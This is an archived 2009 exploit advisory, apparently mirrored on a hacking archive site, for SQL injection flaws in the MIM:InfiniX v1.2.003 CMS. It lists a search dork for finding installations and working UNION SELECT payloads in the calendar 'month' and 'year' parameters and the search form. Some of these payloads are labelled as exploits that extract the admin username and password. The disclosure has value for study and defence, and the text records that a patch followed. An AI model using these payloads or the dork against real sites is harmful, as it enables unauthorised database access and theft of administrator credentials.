AOH :: HP Unsorted M :: VA3302.HTM

MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003--->



MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003--->
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003--->



--------------------------------------------------------------------------=0D
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003-->=0D
--------------------------------------------------------------------------=0D
=0D
CMS INFORMATION:=0D
=0D
-->WEB: http://mim.infinix.it=0D 
-->DOWNLOAD: https://sourceforge.net/projects/infinix/=0D
-->DEMO: http://mim.infinix.it=0D 
-->CATEGORY: CMS / Portal=0D
-->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info...=0D
		in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store...=0D
-->RELEASED: 2009-04-21=0D
=0D
CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: "Developed by rbk"=0D
-->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES=0D
-->AFFECT VERSION: 1.2.003 (maybe <= ?)=0D
-->Discovered Bug date: 2009-04-27=0D
-->Reported Bug date: 2009-04-27=0D
-->Fixed bug date: 2009-04-28=0D
-->Info patch: v1.2.003=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)	=0D
=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
SQL INJECTION (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>=0D
=0D
=0D
-------=0D
INTRO:=0D
-------=0D
=0D
=0D
Admin choose to use database or not.=0D
=0D
This CMS is completely vulnerable to SQL Injection (I only show some vars).=0D
=0D
=0D
=0D
------------------=0D
PROOF OF CONCEPT:=0D
------------------=0D
=0D
=0D
For example ("month" and "year" GET vars). Links:=0D
=0D
=0D
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*=0D 
=0D
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009=0D 
=0D
=0D
Another example (search post form). Search this:=0D
=0D
=0D
anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11#=0D
=0D
=0D
----------=0D
EXPLOITS:=0D
----------=0D
=0D
=0D
We get the admin credentials:=0D
=0D
=0D
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/*=0D 
=0D
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009=0D 
=0D
=0D
anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM admin WHERE id=1#=0D
=0D
=0D
=0D
=0D
=0D
=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
##               ESPECIAL GREETZ TO: Str0ke, JosS, ...               ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
##              GREETZ TO: SPANISH H4ck3Rs community!                ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.